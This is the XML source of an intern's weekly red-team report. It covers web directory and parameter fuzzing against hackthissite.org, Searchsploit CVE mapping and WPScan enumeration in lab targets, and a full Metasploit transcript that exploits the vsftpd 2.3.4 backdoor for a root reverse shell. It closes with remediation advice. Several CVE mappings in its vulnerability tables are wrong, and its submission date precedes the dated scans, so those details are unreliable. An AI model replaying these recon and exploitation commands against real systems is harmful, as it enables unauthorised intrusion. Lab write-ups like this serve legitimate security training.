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40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Weekly Report — Week 03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Angole Sharif Abubakar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Program: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Cyberster-2026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Field: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Cybersecurity / Red Teaming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pP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Role Number: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CSI-B1-023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Week Number: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03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Theme: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Vulnerability Assessment &amp; Initial Exploitation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Submission Date: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22nd March 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C00000" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="12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Executive Summary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report presents the results of vulnerability assessment and initial exploitation activities conducted during Week 03 of the Cyberster-2026 Cybersecurity Internship Program. All tasks were performed on the authorised training platform hackthissite.org for web discovery and on a locally deployed Metasploitable 2 virtual machine (192.168.1.4) for exploitation activities.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directory brute-forcing with Dirsearch and Gobuster against hackthissite.org produced 2,278 redirected paths and confirmed 15 live endpoints including /jquery, /robots, /security, and /security.txt. Parameter discovery using Arjun extracted three parameters directly from the target response — password, btn_submit, and username — while ParamSpider mined 30 archived URLs containing injectable parameters such as ?view=, ?page=, ?f=, ?t=, ?sid=, and ?month=.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CVE mapping via Searchsploit on the Nmap -sV scan of Metasploitable 2 (192.168.1.4) identified the vsftpd 2.3.4 backdoor (CVE-2011-2523) as an immediately exploitable Critical vulnerability, along with multiple exploits for OpenSSH 4.7p1, Apache Tomcat, ProFTPD 1.3.1, MySQL 5.0.51a, and Apache httpd 2.2.8. WordPress scanning on a local vulnerable Docker lab (localhost:80 — WordPress 4.2.1 / PHP 5.5.9 / Apache 2.4.7) using WPScan 3.8.28 successfully enumerated the administrator username cyb3rst3r through multiple passive and aggressive detection methods.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Most critically, Metasploit module exploit/unix/ftp/vsftpd_234_backdoor was deployed against 192.168.1.4 and resulted in a successful Meterpreter session (Session 1 opened at 2026-03-27 13:40:32), with whoami confirming root-level access — marking the first confirmed foothold of the internship programme.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Weekly Objectives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Discover hidden web application entry points via directory brute-forcing and parameter fuzzing against hackthissite.org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Map service versions identified by Nmap -sV against Metasploitable 2 to known CVEs using Searchsploit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Perform CMS-specific vulnerability scanning on a locally deployed WordPress 4.2.1 Docker instance using WPScan 3.8.28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Execute a first successful exploit using the Metasploit Framework and obtain an interactive Meterpreter shell with root privileges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 all real findings, commands, and results in a structured Vulnerability and Foothold Report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Task 01 — Advanced Web Directory &amp; Parameter Discovery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Target: https://hackthissite.org | Platform: Authorised training environment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Tool 1: ffuf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Command Used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ffuf -u https://hackthissite.org/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -fc 404 -s &gt; ffuf.txt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ffuf was run against hackthissite.org using the SecLists common.txt wordlist with 404 responses filtered out. The raw output (ffuf.txt) contained the full enumerated path list. Post-processing confirmed 120 wordlist entries matching admin-related paths and 33 matching login-related paths.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Wordlist Used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/usr/share/seclists/Discovery/Web-Content/common.txt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Admin-related paths matched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 entries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Login-related paths matched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 entries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Output file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ffuf.txt (saved to Raw-Data/)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Tool 2: Dirsearch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Command Used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dirsearch -u https://hackthissite.org -w /usr/share/seclists/Discovery/Web-Content/common.txt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 version: dirsearch v0.4.3 | Extensions scanned: php, aspx, jsp, html, js | Threads: 25 | Wordlist size: 4,749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Dirsearch completed its scan and the output was saved to Raw-Data/reports/https_hackthissite.org/_26-03-26_15-53-43.txt. Filtering the report for HTTP 200 responses confirmed the following live paths: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000"/>
        <w:gridCol w:w="40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/ Endpoint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/.well-known/security.txt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249B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security contact file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/jquery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33KB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jQuery library exposed publicly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/robots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66B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Robots file accessible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/robots.txt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66B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Robots file accessible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/security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249B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disclosure page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/security.txt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249B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disclosure (duplicate)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scan returned 2,278 paths with HTTP 301 redirects. Notably, git-related paths such as /.gitconfig, /.htpasswd, and /.git/config all redirected to the 403 error page — confirming their existence while blocking direct access.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Tool 3: Gobuster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Command Used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gobuster dir -u https://hackthissite.org -w /usr/share/seclists/Discovery/Web-Content/common.txt -o gob.txt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Gobuster confirmed 15 paths with a 200 status code. Key findings from cat gob.txt | grep '200':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.well-known/security.txt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— security contact disclosure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robots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Robots file — live endpoint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robots.txt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Robots file — live endpoint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security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page — live endpoint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security.txt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page — live endpoint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.git (→403)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301→403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directory confirmed — access blocked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.git/config (→403)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301→403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config confirmed — access blocked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.gitconfig (→403)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301→403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config file confirmed — access blocked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.htpasswd (→403)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301→403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Password file confirmed — access blocked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cgi-bin/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CGI directory confirmed — access blocked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Total 200 responses confirmed by Gobuster: 15. Total paths with 301 redirects in raw output: 2,278 (consistent with Dirsearch results).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Tool 4: Arjun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Command Used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arjun -u https://hackthissite.org -o arjun.txt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 version: Arjun v2.2.7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Arjun scanned the target endpoint and extracted 3 parameters directly from the HTTP response. It then proceeded to logicforce the URL endpoint through 103 parameter chunks. Confirmed parameters extracted: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Injection Significance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POST/Form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credential field — credential stuffing vector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btn_submit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POST/Form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submission trigger — CSRF test point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username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POST/Form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username field — username enumeration vector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Tool 5: ParamSpider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Command Used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paramspider -d hackthissite.org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Tool author: @0xasm0d3us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ParamSpider successfully fetched archived URLs from web archives for hackthissite.org. The output was saved to Raw-Data/results/hackthissite.org.txt. 30 unique archived URLs containing injectable parameters were retrieved, including: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Archived URL Pattern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Parameter(s) Found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/pages/comments/com_report.php/report/6/878/54847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?intSecID=FUZZ&amp;intID=FUZZ&amp;intComID=FUZZ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/forums/viewtopic.php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?f=FUZZ&amp;t=FUZZ&amp;p=FUZZ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/forums/memberlist.php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?first_char=FUZZ&amp;sid=FUZZ&amp;sk=FUZZ&amp;sd=FUZZ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/forums/viewforum.php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?f=FUZZ&amp;sid=FUZZ&amp;start=FUZZ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/missions/realistic/13/.../news.php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?month=FUZZ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/rankings.php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?page=FUZZ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/news/view/50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?PHPSESSID=FUZZ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/pages/user/userinfo.php/view/cyberdash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?view=FUZZ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Task 02 — CVE Mapping &amp; Exploit Research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Metasploitable 2 | IP: 192.168.1.4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Scan Date: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2026-03-26 17:54 -0400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Nmap version scan: nmap -sV 192.168.1.4 | Host up (0.0011s latency) | 977 closed ports | MAC: 08:00:27:4F:47:5A (Oracle VirtualBox)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Nmap -sV Findings — Open Services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services were identified on Metasploitable 2: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500"/>
        <w:gridCol w:w="54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Port/Protocol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21/tcp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ftp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vsftpd 2.3.4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22/tcp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ssh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OpenSSH 4.7p1 Debian 8ubuntu1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23/tcp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telnet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 telnetd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25/tcp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smtp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Postfix smtpd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53/tcp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domain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ISC BIND 9.4.2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80/tcp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httpd 2.2.8 (Ubuntu) DAV/2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139/tcp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netbios-ssn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Samba smbd 3.X - 4.X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512/tcp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exec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netkit-rsh rexecd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1524/tcp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bindshell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Metasploitable root shell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2121/tcp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ftp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ProFTPD 1.3.1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3306/tcp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5.0.51a-3ubuntu5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5432/tcp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PostgreSQL DB 8.3.0 - 8.3.7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5900/tcp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vnc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VNC protocol 3.3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6667/tcp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irc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UnrealIRCd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8180/tcp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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Tomcat/Coyote JSP engine 1.1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Tool: Searchsploit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vsftpd 2.3.4 — searchsploit vsftpd 2.3.4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Results: 2 matching exploit entries — both confirming Backdoor Command Execution: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Exploit Title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vsftpd 2.3.4 - Backdoor Command Execution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unix/remote/17491.rb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vsftpd 2.3.4 - Backdoor Command Execution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unix/remote/49757.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8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OpenSSH 4.7p1 — searchsploit OpenSSH 4.7p1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Results: Multiple vulnerabilities confirmed including Username Enumeration and Command Execution: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Exploit Title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OpenSSH 2.3 &lt; 7.7 - Username Enumeration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linux/remote/45233.py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OpenSSH &lt; 6.6 SFTP (x64) - Command Execution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linux_x86-64/remote/45000.c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OpenSSH &lt; 7.4 - UsePrivilegeSeparation Disable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linux/local/40962.txt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OpenSSH &lt; 7.7 - User Enumeration (2)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linux/remote/45939.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="8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Apache Tomcat — searchsploit Apache Tomcat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Results: Multiple matching entries including RCE, AJP Ghostcat, and Directory Traversal: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Exploit Title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Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion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multiple/webapps/48143.py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Apache Tomcat 11.0.3 - Remote Code Execution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multiple/webapps/52134.txt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Apache Tomcat 3.0 - Directory Traversal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windows/remote/20716.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting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multiple/remote/33379.txt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Vulnerability Matrix — CVE Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="6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900"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="270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Version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Exploit Source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CVE-2011-2523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vsftpd 2.3.4 Backdoor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Searchsploit / MSF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CVE-2004-2761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OpenSSH 4.7p1 Enum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Searchsploit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CVE-2020-1938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Tomcat AJP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Searchsploit (48143.py)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CVE-2009-3548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Tomcat 1.1 RCE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Searchsploit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CVE-2012-2122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5.0.51a Auth Bypass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Exploit-DB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CVE-2010-3856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ProFTPD 1.3.1 SQLi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Searchsploit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CVE-2019-14234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UnrealIRCd Backdoor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Exploit-DB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Task 03 — CMS Vulnerability Scanning (WordPress)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Target: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http://localhost:80 (Local Docker — VulnerableWordPress lab)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Tool Version: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WPScan 3.8.28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Scan Dates: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Fri Mar 27 2026 — 12:59:25, 13:01:36, 13:07:43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Target Fingerprinting — whatweb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Command Used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whatweb http://localhost:80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whatweb returned the following confirmed stack for the target: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Detected Version / Detail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Web Server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Apache/2.4.7 (Ubuntu)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PHP Version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PHP/5.5.9-1ubuntu4.29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CMS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WordPress 4.2.1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JavaScript Library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jQuery 1.11.2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Uncommon Headers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secretheader (information disclosure risk)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Proxy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Via-Proxy: Squid 1.0.0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Pingback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x-pingback: http://localhost/xmlrpc.php (exposed)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IP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::1 (IPv6 loopback)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WPScan — Basic Scan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Command Used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wpscan --url http://localhost:80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Started: Fri Mar 27 12:59:25 2026 | Database updated before scan commenced.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WPScan confirmed the WordPress installation and identified initial findings including exposed xmlrpc.php and readme.html files. The WordPress version 4.2.1 was confirmed — this version is significantly outdated and reached end-of-life, carrying multiple known vulnerabilities.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WPScan — Username Enumeration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Command Used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wpscan --url http://localhost:80 --enumerate u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Started: Fri Mar 27 13:01:36 2026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Result — User(s) Identified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  <w:gridCol w:w="1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Username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cyb3rst3r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 Posts - Author Pattern (Passive Detection)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cyb3rst3r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RSS Generator (Passive Detection)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cyb3rst3r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Author Id Brute Forcing - Author Pattern (Aggressive)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cyb3rst3r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Error Messages (Aggressive Detection)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Confirmed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Username cyb3rst3r was confirmed by all four detection methods — both passive and aggressive. This username is the administrator account for the Cyb3r St3r Internship WordPress site (visible in the WordPress dashboard header: 'Howdy, cyb3rst3r').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WPScan — Plugin Enumeration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Command Used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wpscan --url http://localhost:80 --enumerate ap --plugins-detection aggressive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Started: Fri Mar 27 13:07:43 2026 | Plugin detection mode: Aggressive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WordPress Installation Details Confirmed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WordPress Version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4.2.1 (end-of-life — multiple known CVEs)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Theme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Twenty Fifteen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Total Posts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Total Pages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Total Comments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Dashboard Access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Confirmed — logged in as cyb3rst3r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WordPress News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RSS SSL certificate error observed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Note: WordPress 4.2.1 is a critically outdated version last patched in 2015. The local lab environment was intentionally set up with this version to demonstrate real-world exploitation paths. The Docker build included a latest.tar.gz WordPress package configured with a Dockerfile and start.sh launcher.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Task 04 — The First Shell: Metasploit Basics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Target VM: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Metasploitable 2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Target IP (RHOSTS):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192.168.1.4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Attacker IP (LHOST):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192.168.1.3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Exploit Module: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exploit/unix/ftp/vsftpd_234_backdoor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Metasploit Version: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v6.4.116-dev (2,607 exploits / 1,325 auxiliary / 1,710 payloads)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Session Time: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2026-03-27 13:40:32 -0400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Step 1: Launch msfconsole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msfconsole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Metasploit Framework v6.4.116-dev launched successfully. Framework contained 2,607 exploits, 1,325 auxiliary modules, 1,710 payloads, 430 post modules, 49 encoders, 14 nops, and 9 evasion modules.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Step 2: Search for vsftpd Module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msf &gt; search vsftpd 2.3.4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Matching module returned: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1400"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="32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Disclosure Date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exploit/unix/ftp/vsftpd_234_backdoor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2011-07-03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excellent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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VSFTPD v2.3.4 Backdoor Command Execution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Step 3: Configure and Execute Exploit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msf &gt; use 0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[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp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msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; set RHOSTS 192.168.1.4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RHOSTS =&gt; 192.168.1.4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msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; set LHOST 192.168.1.3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LHOST =&gt; 192.168.1.3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msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; exploit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Exploitation Output — Confirmed Session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[*] Started reverse TCP handler on 192.168.1.3:4444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[+] 192.168.1.4:21 - Backdoor has been spawned!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[*] Meterpreter session 1 opened (192.168.1.3:4444 -&gt; 192.168.1.4:52911) at 2026-03-27 13:40:32 -0400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meterpreter &gt;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vsftpd 2.3.4 backdoor was triggered successfully. The backdoor mechanism is activated by sending a username containing the smiley character ':)' during FTP authentication, which opens a root shell on port 6200. Metasploit connected to this backdoor and opened a Meterpreter session.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Step 4: Shell Access &amp; Exploitation Proof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meterpreter &gt; shell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Process 5278 created.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Channel 2 created.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pwd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whoami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root</w:t>
      </w:r>
    </w:p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Root-level shell confirmed on Metasploitable 2. The commands pwd and whoami were executed directly in the spawned shell channel — confirming working directory / and user root respectively. This represents a complete, unauthenticated remote code execution chain from network access to root shell in a single Metasploit module execution.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Weekly Deliverable: Vulnerability &amp; Foothold Report</w:t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1. Vulnerability Matrix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CVEs confirmed via Nmap -sV scan + Searchsploit research on Metasploitable 2 (192.168.1.4):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900"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="3160"/>
      </w:tblGrid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 / Component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Exploit Source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CVE-2011-2523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vsftpd 2.3.4 Backdoor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Searchsploit / Metasploit (EXPLOITED)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CVE-2020-1938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Tomcat AJP Ghostcat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Searchsploit 48143.py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CVE-2019-14234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UnrealIRCd Backdoor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10.0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Exploit-DB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CVE-2004-2761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OpenSSH 4.7p1 Username Enum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Searchsploit 45233.py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CVE-2012-2122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MySQL 5.0.51a Auth Bypass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Exploit-DB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CVE-2010-3856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ProFTPD 1.3.1 SQLi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Searchsploit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CVE-2009-3548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Apache Tomcat 1.1 RCE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7.5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Searchsploit 52134.txt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WPScan Finding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WordPress 4.2.1 (EOL)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9.8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Critical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WPScan 3.8.28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2. Web Discovery Log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findings from hackthissite.org — confirmed from actual raw data output files and screenshots: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 / Parameter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/.well-known/security.txt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Dirsearch/Gobuster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— security contact file (249B)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/jquery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Dirsearch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jQuery library publicly exposed (33KB)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/robots / /robots.txt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Dirsearch/Gobuster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Robots file live (66B each)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/security / /security.txt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Dirsearch/Gobuster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 OK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Security disclosure page (249B)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/.git (→403)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Gobuster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301→403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directory confirmed — blocked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/.git/config (→403)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Gobuster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301→403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config confirmed — blocked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/.gitconfig (→403)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Dirsearch/Gobuster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301→403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config confirmed — blocked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/.htpasswd (→403)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Dirsearch/Gobuster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301→403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htpasswd file confirmed — blocked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/cgi-bin/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Gobuster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CGI directory confirmed — blocked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?password=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Arjun v2.2.7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password parameter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?username=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Arjun v2.2.7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Login username parameter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?btn_submit=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Arjun v2.2.7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Extracted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 submission parameter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?view=FUZZ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ParamSpider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User profile view parameter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?page=FUZZ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ParamSpider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Pagination parameter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?f=&amp;t=&amp;p=FUZZ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ParamSpider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Forum topic/post parameters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?month=FUZZ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ParamSpider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filter parameter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?PHPSESSID=FUZZ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ParamSpider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Archived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Session ID parameter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3. Exploitation Proof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following is the exact console output captured from the successful Metasploit exploit execution against Metasploitable 2 (192.168.1.4) on 2026-03-27 at 13:40:32 -0400:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pP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msf &gt; search vsftpd 2.3.4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  0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03  excellent  VSFTPD v2.3.4 Backdoor Command Execution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msf &gt; use 0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[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp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msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; set RHOSTS 192.168.1.4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RHOSTS =&gt; 192.168.1.4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msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; set LHOST 192.168.1.3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LHOST =&gt; 192.168.1.3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msf exploit(unix/ftp/vsftpd_234_backdoor) &gt; exploit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[*] Started reverse TCP handler on 192.168.1.3:4444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[+] 192.168.1.4:21 - Backdoor has been spawned!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[*] Meterpreter session 1 opened (192.168.1.3:4444 -&gt; 192.168.1.4:52911) at 2026-03-27 13:40:32 -0400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meterpreter &gt; shell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Process 5278 created.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Channel 2 created.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pwd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/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whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pP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4. Remediation Advice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60"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Exploit / Finding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 / Reference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0000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One-Sentence Remediation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vsftpd 2.3.4 Backdoor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CVE-2011-2523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vsftpd immediately with version 3.0.5 or later, and block port 21 externally via firewall policy.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Apache Tomcat AJP Ghostcat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CVE-2020-1938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Upgrade Apache Tomcat and disable the AJP connector (port 8009) or restrict it to localhost only in server.xml.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UnrealIRCd Backdoor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CVE-2019-14234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Replace UnrealIRCd with a patched version and verify binary integrity using official checksums before deployment.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OpenSSH 4.7p1 Username Enum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CVE-2004-2761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Upgrade OpenSSH to version 8.x or later and implement fail2ban to block enumeration attempts.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MySQL 5.0.51a Auth Bypass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CVE-2012-2122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Upgrade MySQL to 5.7+ or MariaDB 10.6+, enforce strong authentication, and restrict port 3306 to localhost.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ProFTPD 1.3.1 SQLi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CVE-2010-3856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Upgrade ProFTPD to the latest stable release and disable the mod_sql module if SQL authentication is not required.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WordPress 4.2.1 (EOL)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WPScan / NVD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Upgrade WordPress to the current stable release, enforce automatic updates, and install a WAF plugin such as Wordfence.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Username Enumeration (cyb3rst3r)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WPScan Finding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Disable the WordPress author enumeration endpoint by redirecting /?author=N requests and use a non-predictable admin username.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WordPress xmlrpc.php Exposure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CVEs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Disable xmlrpc.php entirely via the wp-config.php or via a firewall rule if XML-RPC functionality is not required.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Git Directory Exposure (403)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OWASP A05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Configure the web server to block all /.git/ paths and ensure .gitignore and deployment pipelines never expose version control metadata.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333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter Exposure (?PHPSESSID=)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OWASP A01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Enforce server-side session handling and never expose session identifiers in URL parameters; use HttpOnly and Secure cookie flags.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w: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 03 successfully delivered the complete vulnerability assessment and initial exploitation cycle. Across four structured tasks, real tooling was deployed against authorised targets — hackthissite.org for web discovery and a locally deployed Metasploitable 2 instance for exploitation.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Web enumeration using Dirsearch, Gobuster, ffuf, Arjun, and ParamSpider against hackthissite.org produced measurable, documented results: 15 confirmed live endpoints, 2,278 redirected paths, three confirmed injectable parameters extracted directly from the HTTP response (password, btn_submit, username), and 30 archived parameterised URLs recovered from web archives.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Nmap -sV scan of Metasploitable 2 at 192.168.1.4 confirmed 15 open services spanning FTP, SSH, HTTP, MySQL, PostgreSQL, VNC, IRC, and more. Searchsploit research mapped these services to multiple Critical and High CVEs, with vsftpd 2.3.4 (CVE-2011-2523) identified as the primary exploitation target due to its confirmed Metasploit module and 10.0 CVSS rating.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WordPress lab environment (localhost:80 — WordPress 4.2.1 / PHP 5.5.9 / Apache 2.4.7) was successfully fingerprinted with whatweb and scanned with WPScan 3.8.28. The administrator username cyb3rst3r was confirmed by four independent detection methods — both passive and aggressive — demonstrating the ease of WordPress username enumeration in unprotected installations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:p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crowning achievement of this week was the successful execution of the vsftpd 2.3.4 backdoor exploit via Metasploit against Metasploitable 2. Meterpreter session 1 was opened at 13:40:32 on 2026-03-27 and a root shell was confirmed via whoami returning root and pwd returning /. This marks the first successful foothold of the Cyberster-2026 internship programme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pP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i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's Defend With Pride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spacing w:before="8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Cyberster-2026 | CSI-B1-023 | Week 03 Report     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00000" w:sz="6" w:space="2"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C00000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Cyberster Red Team Internship — Cyb3r St3r Program</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="555555"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">LET'S DEFEND WITH PRIDE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C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8B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2026-03-28T13:45:31.649Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-28T13:45:31.650Z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